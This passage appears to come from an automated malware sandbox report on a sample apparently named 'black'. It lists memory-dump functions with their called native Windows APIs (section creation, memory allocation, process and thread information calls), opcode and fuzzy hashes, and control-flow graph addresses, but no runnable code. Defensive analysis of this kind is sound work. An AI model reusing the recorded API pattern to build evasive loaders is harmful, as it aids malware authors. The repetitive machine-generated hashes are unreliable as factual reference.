                                                  • Instruction ID: 06b78c8350fe3f7f8e3ca4464d5097d458bd0e14c0c4e1db97cc2b912b3d48c2
                                                  • Opcode Fuzzy Hash: a886d4ec8a17ed03b60fe254650d9f94ab8070ff89038997c529c21b60a0d40f
                                                  • Instruction Fuzzy Hash: C14179B5D052589FCF10CFA9D584ADEFBF1BB49310F10A02AE918B7210D735A955CF98
                                                  Function 04BAC270 Relevance: 1.6, APIs: 1, Instructions: 119nativeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • NtCreateSection.NTDLL(?,?,?,?,?,?,?), ref: 04BAC33B
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.4151925714.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_4ba0000_black.jbxd
                                                  Similarity
                                                  • API ID: CreateSection
                                                  • String ID:
                                                  • API String ID: 2449625523-0
                                                  • Opcode ID: f646937a54701fd09a89e3cb629955ac1cc1cb66175c731001192989225c835f
                                                  • Instruction ID: 4f2b6faa11702d532ebba73148925baf7b3e179a3eab02a442e553aee39dc3ff
                                                  • Opcode Fuzzy Hash: f646937a54701fd09a89e3cb629955ac1cc1cb66175c731001192989225c835f
                                                  • Instruction Fuzzy Hash: AF4178B5D052589FCF10CFA9D580ADEFBF1BB49310F20902AE818B7210D735A955CF98
                                                  Function 04BAC130 Relevance: 1.6, APIs: 1, Instructions: 114filenativeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • NtOpenFile.NTDLL(?,?,?,?,?,?), ref: 04BAC1F8
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.4151925714.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_4ba0000_black.jbxd
                                                  Similarity
                                                  • API ID: FileOpen
                                                  • String ID:
                                                  • API String ID: 2669468079-0
                                                  • Opcode ID: c9f02547ceda6a85a2f5966ce3b8466ca2bf22ba788a7eb528a14133e9e25aaa
                                                  • Instruction ID: 7bb330f6fd8e995d22b48702786786835612aa90be76435fd7224ebb7e1fa6b3
                                                  • Opcode Fuzzy Hash: c9f02547ceda6a85a2f5966ce3b8466ca2bf22ba788a7eb528a14133e9e25aaa
                                                  • Instruction Fuzzy Hash: 5A4187B9D042589FCF00CFA9D984ADEFBB1FB49310F10902AE819B7210D735A956CF94
                                                  Function 04BABC79 Relevance: 1.6, APIs: 1, Instructions: 112memorynativeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • NtAllocateVirtualMemory.NTDLL(?,?,?,?,?,?), ref: 04BABD3D
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.4151925714.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_4ba0000_black.jbxd
                                                  Similarity
                                                  • API ID: AllocateMemoryVirtual
                                                  • String ID:
                                                  • API String ID: 2167126740-0
                                                  • Opcode ID: fe99cdc549d33630f4ee45704a04e60e41a0b28874ef81c514e46fd32dc07f8e
                                                  • Instruction ID: 25e7ae509352782355cca76174740569967f93c41e93fb65e16de913828f5012
                                                  • Opcode Fuzzy Hash: fe99cdc549d33630f4ee45704a04e60e41a0b28874ef81c514e46fd32dc07f8e
                                                  • Instruction Fuzzy Hash: 474187B5D042589FCF10CFA9D980AEEFBB1BB49310F20942AE918B7210D735A956CF58
                                                  Function 04BAC138 Relevance: 1.6, APIs: 1, Instructions: 112filenativeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • NtOpenFile.NTDLL(?,?,?,?,?,?), ref: 04BAC1F8
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.4151925714.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_4ba0000_black.jbxd
                                                  Similarity
                                                  • API ID: FileOpen
                                                  • String ID:
                                                  • API String ID: 2669468079-0
                                                  • Opcode ID: 14897517667a2f2487342eb46da4c35a048fcb779e3a80a46da4c357d90a9696
                                                  • Instruction ID: 824c74f18bffc7b33bd14998fedd7941fb8fef42026ac8ee5a97d03bc0dd669f
                                                  • Opcode Fuzzy Hash: 14897517667a2f2487342eb46da4c35a048fcb779e3a80a46da4c357d90a9696
                                                  • Instruction Fuzzy Hash: 634178B9D042589FCF10CFA9D984ADEFBB1FB49310F10902AE819B7210D735A955CF98
                                                  Function 04BABC80 Relevance: 1.6, APIs: 1, Instructions: 111memorynativeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • NtAllocateVirtualMemory.NTDLL(?,?,?,?,?,?), ref: 04BABD3D
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.4151925714.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_4ba0000_black.jbxd
                                                  Similarity
                                                  • API ID: AllocateMemoryVirtual
                                                  • String ID:
                                                  • API String ID: 2167126740-0
                                                  • Opcode ID: 5628e74dc386d515d2de462124472e4f8c2062f798a9bce8c0546a7e135fee37
                                                  • Instruction ID: dd1aed15698e05512c84f18741ebafffaa176f3732762cdf7b65190d70b9985a
                                                  • Opcode Fuzzy Hash: 5628e74dc386d515d2de462124472e4f8c2062f798a9bce8c0546a7e135fee37
                                                  • Instruction Fuzzy Hash: 444188B9D042589FCF10CFA9D984ADEFBB1FB49310F10942AE918B7210D735A955CFA8
                                                  Function 04BAB418 Relevance: 1.6, APIs: 1, Instructions: 105nativeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • NtQueryInformationProcess.NTDLL(?,?,?,?,?), ref: 04BAB4CF
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.4151925714.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_4ba0000_black.jbxd
                                                  Similarity
                                                  • API ID: InformationProcessQuery
                                                  • String ID:
                                                  • API String ID: 1778838933-0
                                                  • Opcode ID: 6b3f7fc17e6c6fb77cb486409383043f393f02b2054882fc2a1b57389b20bd9e
                                                  • Instruction ID: 1453e0543585f49d4fe6f513322cc367ddbe84b795b323b80b865769ddcee9d5
                                                  • Opcode Fuzzy Hash: 6b3f7fc17e6c6fb77cb486409383043f393f02b2054882fc2a1b57389b20bd9e
                                                  • Instruction Fuzzy Hash: 9F41A7B5D042589FCF10CFA9D984ADEFBB1BB49310F10942AE915B7210D735A945CF64
                                                  Function 04BAB420 Relevance: 1.6, APIs: 1, Instructions: 103nativeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • NtQueryInformationProcess.NTDLL(?,?,?,?,?), ref: 04BAB4CF
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.4151925714.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_4ba0000_black.jbxd
                                                  Similarity
                                                  • API ID: InformationProcessQuery
                                                  • String ID:
                                                  • API String ID: 1778838933-0
                                                  • Opcode ID: 7196f98215ee69920f76fe35c01edd88539f10bd2b10d9abf0669e41ef37d38a
                                                  • Instruction ID: 3665244ba2b593fa3cc2cf8c4d21c5a4082d205cbac684c4218b94e86c581924
                                                  • Opcode Fuzzy Hash: 7196f98215ee69920f76fe35c01edd88539f10bd2b10d9abf0669e41ef37d38a
                                                  • Instruction Fuzzy Hash: 423197B9D042589FCF10CFA9D980ADEFBB1FB49310F10942AE915B7210D735A945CF68
                                                  Function 04BAB540 Relevance: 1.6, APIs: 1, Instructions: 96nativethreadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • NtSetInformationThread.NTDLL(?,?,?,?), ref: 04BAB5E7
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.4151925714.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_4ba0000_black.jbxd
                                                  Similarity
                                                  • API ID: InformationThread
                                                  • String ID:
                                                  • API String ID: 4046476035-0
                                                  • Opcode ID: 9f44510aa93588402da1028da02a91c5613f86234f6c806585804ebb267a53e0
                                                  • Instruction ID: ab2ab6f0ea451c6377551958ac49a710e0530a7cfcf57693583c34cfbce3ed3c
                                                  • Opcode Fuzzy Hash: 9f44510aa93588402da1028da02a91c5613f86234f6c806585804ebb267a53e0
                                                  • Instruction Fuzzy Hash: 0C31C7B4D042589FCF14CFA9E880AEEFBB0BF49310F24942AE815BB210D735A845CF58
                                                  Function 04BAB548 Relevance: 1.6, APIs: 1, Instructions: 94nativethreadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • NtSetInformationThread.NTDLL(?,?,?,?), ref: 04BAB5E7
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.4151925714.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_4ba0000_black.jbxd
                                                  Similarity
                                                  • API ID: InformationThread
                                                  • String ID:
                                                  • API String ID: 4046476035-0
                                                  • Opcode ID: 8bb35c84d18aaac231918ca7048200713aef2c2041e9cce75e6b5f39b6e09f9f
                                                  • Instruction ID: 9d78f46af4a8fc1efc9b20f05f207c3972471a80de26760807260177da9c2ca2
                                                  • Opcode Fuzzy Hash: 8bb35c84d18aaac231918ca7048200713aef2c2041e9cce75e6b5f39b6e09f9f
                                                  • Instruction Fuzzy Hash: 093198B5D042589FCF10CFA9E984ADEFBB1FB49310F24942AE815B7210D735A945CF98
                                                  Function 046C0725 Relevance: .0, Instructions: 48COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.4151714375.00000000046C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_46c0000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7246b213d97a4479036bc2c73b5b793e203e747e5bd11779ec8a5bba58b4fb51
                                                  • Instruction ID: 08cc507973dfaa3161c50d28d48c3171032bcf23f7bdbd666da610d3efd7c992
                                                  • Opcode Fuzzy Hash: 7246b213d97a4479036bc2c73b5b793e203e747e5bd11779ec8a5bba58b4fb51
                                                  • Instruction Fuzzy Hash: AA112774E49249DFCB45CFA8C5506ADBFB0EF0A300F1441EAD415E72A2E3349A45DF61
                                                  Function 046C127D Relevance: .0, Instructions: 45COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.4151714375.00000000046C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_46c0000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ab7978232d56542263b718e9edc5f9442d5aeb380226c1fb4ee150fe005661b3
                                                  • Instruction ID: 2867b990f8c5df006a9fafb855564984cdf4199f82f681632d820a9654f3e30c
                                                  • Opcode Fuzzy Hash: ab7978232d56542263b718e9edc5f9442d5aeb380226c1fb4ee150fe005661b3
                                                  • Instruction Fuzzy Hash: DD115BB0D0D2898FCB52DFA884406FDBFB0AF07215F1541EAD050EB292E3785A41DF95
                                                  Function 046C0740 Relevance: .0, Instructions: 42COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.4151714375.00000000046C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_46c0000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1233bb34eaa93795d244f7f133018aba917d86ee7d3b517d539bc83ecbdb6d0f
                                                  • Instruction ID: a3ae5d36ad384c501b2dc071ec7a7caaab0ac2c328ac0efb2d6d8b0a9254cb14
                                                  • Opcode Fuzzy Hash: 1233bb34eaa93795d244f7f133018aba917d86ee7d3b517d539bc83ecbdb6d0f
                                                  • Instruction Fuzzy Hash: 15019278E44219DFCB44DFE8D544ABEBBB0FB09301F1055AAD415A7350E730AA41DFA5
                                                  Function 046C1298 Relevance: .0, Instructions: 41COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.4151714375.00000000046C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_46c0000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: bee9ca747ec042a9ff6d42daee95661e7e3d7a5a2084030d55c6c5c12d225c6c
                                                  • Instruction ID: 3e5e339c751c38089ab989c724d78b71366b3a82ea62af0efc75bdd1435f4d65
                                                  • Opcode Fuzzy Hash: bee9ca747ec042a9ff6d42daee95661e7e3d7a5a2084030d55c6c5c12d225c6c
                                                  • Instruction Fuzzy Hash: D501CEB4E042199FCB44DFE8C540AFEBBB0BB0A301F1045A99814A7340E778AA80DFA5
                                                  Function 046C0F27 Relevance: .0, Instructions: 32COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.4151714375.00000000046C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_46c0000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a3f84ae7b6f8427378ea642061aa0aee0c82d62f779f90f92ffe550295f580e3
                                                  • Instruction ID: 46b9e3c709e40ea9f39ecf40ea0fb1f4d55ba7db75f1231517e301b657eedcd9
                                                  • Opcode Fuzzy Hash: a3f84ae7b6f8427378ea642061aa0aee0c82d62f779f90f92ffe550295f580e3
                                                  • Instruction Fuzzy Hash: 23F01CB4D0A348AFCB41DFB8A4545DCBFB0EB06304F0491EBC858E7292E6348A46CB46
                                                  Function 046C0F38 Relevance: .0, Instructions: 24COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.4151714375.00000000046C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_46c0000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5d6c1c1f894c5fbb611ce06ecfe7abf1419c50097f3cf77c7d776456caf16f6a
                                                  • Instruction ID: b36130193937fbf2db6c36479334fc19a389b44b36144c52fea2b70d807951fc
                                                  • Opcode Fuzzy Hash: 5d6c1c1f894c5fbb611ce06ecfe7abf1419c50097f3cf77c7d776456caf16f6a
                                                  • Instruction Fuzzy Hash: E4E07574D05208EFCB54DFA8E4446ADFBF4AB45300F1095A99818B3350E7749A50DB45
                                                  Function 046C0A08 Relevance: 5.1, Strings: 4, Instructions: 58COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 2531 46c0a08-46c0a23 2532 46c0a2a-46c0a2e 2531->2532 2533 46c0a25 2531->2533 2534 46c0a4f 2532->2534 2535 46c0a30-46c0a39 2532->2535 2533->2532 2538 46c0a52-46c0a59 2534->2538 2536 46c0a3b-46c0a3e 2535->2536 2537 46c0a40-46c0a43 2535->2537 2539 46c0a4d 2536->2539 2537->2539 2540 46c0a7a 2538->2540 2541 46c0a5b-46c0a64 2538->2541 2539->2538 2542 46c0a7d-46c0a84 2540->2542 2543 46c0a6b-46c0a6e 2541->2543 2544 46c0a66-46c0a69 2541->2544 2546 46c0aa5 2542->2546 2547 46c0a86-46c0a8f 2542->2547 2545 46c0a78 2543->2545 2544->2545 2545->2542 2548 46c0aa8-46c0aaf 2546->2548 2549 46c0a96-46c0a99 2547->2549 2550 46c0a91-46c0a94 2547->2550 2552 46c0ab6-46c0aba 2548->2552 2551 46c0aa3 2549->2551 2550->2551 2551->2548
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.4151714375.00000000046C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_46c0000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $^q$$^q$$^q$$^q
                                                  • API String ID: 0-2125118731
                                                  • Opcode ID: 25e3945031d5f9a2c38bda598379d65281b0f996c4f06984dbf56baf6ac70845
                                                  • Instruction ID: 08b2698276464e192e1c57f68158811ebfaea9bb7f25da1340544b19969053ed
                                                  • Opcode Fuzzy Hash: 25e3945031d5f9a2c38bda598379d65281b0f996c4f06984dbf56baf6ac70845
                                                  • Instruction Fuzzy Hash: 6F21A074A0020CEFDB18DFE8D544AADBBF1FB54300F208599E405AB356E770AA85DB40
                                                  Function 046C09ED Relevance: 2.6, Strings: 2, Instructions: 55COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 2722 46c09ed-46c0a23 2723 46c0a2a-46c0a2e 2722->2723 2724 46c0a25 2722->2724 2725 46c0a4f 2723->2725 2726 46c0a30-46c0a39 2723->2726 2724->2723 2729 46c0a52-46c0a59 2725->2729 2727 46c0a3b-46c0a3e 2726->2727 2728 46c0a40-46c0a43 2726->2728 2730 46c0a4d 2727->2730 2728->2730 2731 46c0a7a 2729->2731 2732 46c0a5b-46c0a64 2729->2732 2730->2729 2733 46c0a7d-46c0a84 2731->2733 2734 46c0a6b-46c0a6e 2732->2734 2735 46c0a66-46c0a69 2732->2735 2737 46c0aa5 2733->2737 2738 46c0a86-46c0a8f 2733->2738 2736 46c0a78 2734->2736 2735->2736 2736->2733 2739 46c0aa8-46c0aaf 2737->2739 2740 46c0a96-46c0a99 2738->2740 2741 46c0a91-46c0a94 2738->2741 2743 46c0ab6-46c0aba 2739->2743 2742 46c0aa3 2740->2742 2741->2742 2742->2739
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.4151714375.00000000046C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_46c0000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $^q$$^q
                                                  • API String ID: 0-355816377
                                                  • Opcode ID: 1eb10c147dc8ca8d78568195a68f8266adf3cf16dc4610d50383352fab4c726e
                                                  • Instruction ID: 6241691afc1cbc94f335788c7aca56ed6c7ffae164fe126ff858a218905384ce
                                                  • Opcode Fuzzy Hash: 1eb10c147dc8ca8d78568195a68f8266adf3cf16dc4610d50383352fab4c726e
                                                  • Instruction Fuzzy Hash: B511F370E09248EFCB1ADFE8D4446BCBBF0EB22300F1085EAD4059B292E7746A85DB41
                                                  Function 046C040D Relevance: .0, Instructions: 34COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.4151714375.00000000046C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_46c0000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a948996ff03eb5d70a85a662b77c1ab49b4509310da77460fc97c90c05cd61cd
                                                  • Instruction ID: 0809c748703459b383175a8f872440dfcf2cfbd9437abbce5a96d9c125c5a536
                                                  • Opcode Fuzzy Hash: a948996ff03eb5d70a85a662b77c1ab49b4509310da77460fc97c90c05cd61cd
                                                  • Instruction Fuzzy Hash: 67016930909388DFC706CBA485546AD7FB0EB06300F1981DEC804CB2A2E7706E44DB52
                                                  Function 046C0428 Relevance: .0, Instructions: 30COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.4151714375.00000000046C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_46c0000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6bb8608d80e9cd4003509603aec8487a611602d6a925a65970fcc86f0c123dd4
                                                  • Instruction ID: 7fe3a1cd39e89ae24b54e1d09f344c0403e79723082652f8f0b9a114946c21a4
                                                  • Opcode Fuzzy Hash: 6bb8608d80e9cd4003509603aec8487a611602d6a925a65970fcc86f0c123dd4
                                                  • Instruction Fuzzy Hash: 18F0B734A00208EFCB58DFE8D544AADBBF5EB44701F2085A9D40597391EB70AE95DB51
                                                  Function 046C0085 Relevance: .0, Instructions: 28COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.4151714375.00000000046C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_46c0000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9eb40ffbe8f1665d7727975e7d05c9f33ea69481854884538f71da870fa29206
                                                  • Instruction ID: 2014136460c2048493212b76603dea3f7e49c7de2ae723811333b721ce1a1d79
                                                  • Opcode Fuzzy Hash: 9eb40ffbe8f1665d7727975e7d05c9f33ea69481854884538f71da870fa29206
                                                  • Instruction Fuzzy Hash: 95F08C6094E3C49FC703DBB4591529D7FB0AF03204B0A40DFC884DF2A3D6241E09D762
                                                  Function 046C1230 Relevance: .0, Instructions: 26COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.4151714375.00000000046C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_46c0000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2b59e358b5bac0d787f9fd6ed7932638d7c74c5ddd9fa7703d700730a0502128
                                                  • Instruction ID: f683135e07ffa5bc917d5580838eee8700a05737c5c7321bd3fb69ed51c9663d
                                                  • Opcode Fuzzy Hash: 2b59e358b5bac0d787f9fd6ed7932638d7c74c5ddd9fa7703d700730a0502128
                                                  • Instruction Fuzzy Hash: BFF01534A4620CEFCB18DAA4D1546FCB3BAEB42700F2008ACD4059B395EB756E95EB51
                                                  Function 046C1508 Relevance: .0, Instructions: 26COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.4151714375.00000000046C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_46c0000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 570c851dbc26a7c2e4a8b509fb5d25ea15f7f142387dc2898051e8819ef644c1
                                                  • Instruction ID: 0ea22ee53952c540eb524a397459c2ce119625c8278a70fc0b218c4292fdc10d
                                                  • Opcode Fuzzy Hash: 570c851dbc26a7c2e4a8b509fb5d25ea15f7f142387dc2898051e8819ef644c1
                                                  • Instruction Fuzzy Hash: A5F01CB0A41108EBCB68DA94D144AFC7775EB42300FA000ACD4025B381EB75AF51EF50
                                                  Function 046C0999 Relevance: .0, Instructions: 24COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.4151714375.00000000046C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_46c0000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2f919ec4f8e1c9a7146cfce964b6326420adc78dd17b1cd7727a73acc7bddcb1
                                                  • Instruction ID: d82537f5055117e08dd6c5c18eb558c3ecf00c70dcb016f5737d7ad1f1ad7f93
                                                  • Opcode Fuzzy Hash: 2f919ec4f8e1c9a7146cfce964b6326420adc78dd17b1cd7727a73acc7bddcb1
                                                  • Instruction Fuzzy Hash: 7EF01C6090E3C4CFC702EBB49965AAC7FB0AF03205B1944DBC484DB1A3EA291E14D752
                                                  Function 046C122A Relevance: .0, Instructions: 23COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.4151714375.00000000046C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_46c0000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2069236b1de7710d60c4a5926092dc7f3399f82db26f85b6847e057617efb49d
                                                  • Instruction ID: ef7524ac45fc5e0f6a05f402cdd1547a6dd654ee62d17ea15c98a7b3648844f1
                                                  • Opcode Fuzzy Hash: 2069236b1de7710d60c4a5926092dc7f3399f82db26f85b6847e057617efb49d
                                                  • Instruction Fuzzy Hash: 4EE0E534A49248EFCB29CAA4D1447F87276EB12305F1004ADD4059B291E779AE91DB46
                                                  Function 046C1502 Relevance: .0, Instructions: 22COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.4151714375.00000000046C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_46c0000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 46d7e120aa8e176128b49b1f3d6e7b2668d9cb5029bbdd42733aa0faa84b9acc
                                                  • Instruction ID: 9c9f5c300a132501974a031334d78e89c8dc4716b9d879ceff1869c0d9394c91
                                                  • Opcode Fuzzy Hash: 46d7e120aa8e176128b49b1f3d6e7b2668d9cb5029bbdd42733aa0faa84b9acc
                                                  • Instruction Fuzzy Hash: B4E01AB0945104DFCF65DBA49204BFD7671EF12305F9140ADD4026B291E7B4AF61EF41
                                                  Function 046C00A0 Relevance: .0, Instructions: 17COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.4151714375.00000000046C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_46c0000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 972057eaf183a0e0d06e74494fdc2d1ad52c758d4da06a572628c2e529c3e663
                                                  • Instruction ID: f82b9741daca6c7ab977264b6ce22fbc6de6c109ad908e7c676279cd1f366211
                                                  • Opcode Fuzzy Hash: 972057eaf183a0e0d06e74494fdc2d1ad52c758d4da06a572628c2e529c3e663
                                                  • Instruction Fuzzy Hash: F9D01770E0120CEBCB44EFE9E5016ADBBF9EB45351F5044AD9409AB390EB712F14AB92
                                                  Function 046C09B8 Relevance: .0, Instructions: 17COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.4151714375.00000000046C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_46c0000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5a0545b7efcf55d52126468c0329bdff61b32d1a59909ee61cc4b9c2c410a943
                                                  • Instruction ID: 2bf25487befeb78864f285378ab2df4622b18215cae1c5fceef28bea6f0ea03a
                                                  • Opcode Fuzzy Hash: 5a0545b7efcf55d52126468c0329bdff61b32d1a59909ee61cc4b9c2c410a943
                                                  • Instruction Fuzzy Hash: 05D01770E01208EBC744EFE8D901BADBBF9EB04344F1044A8A809A7350EB716F10EB91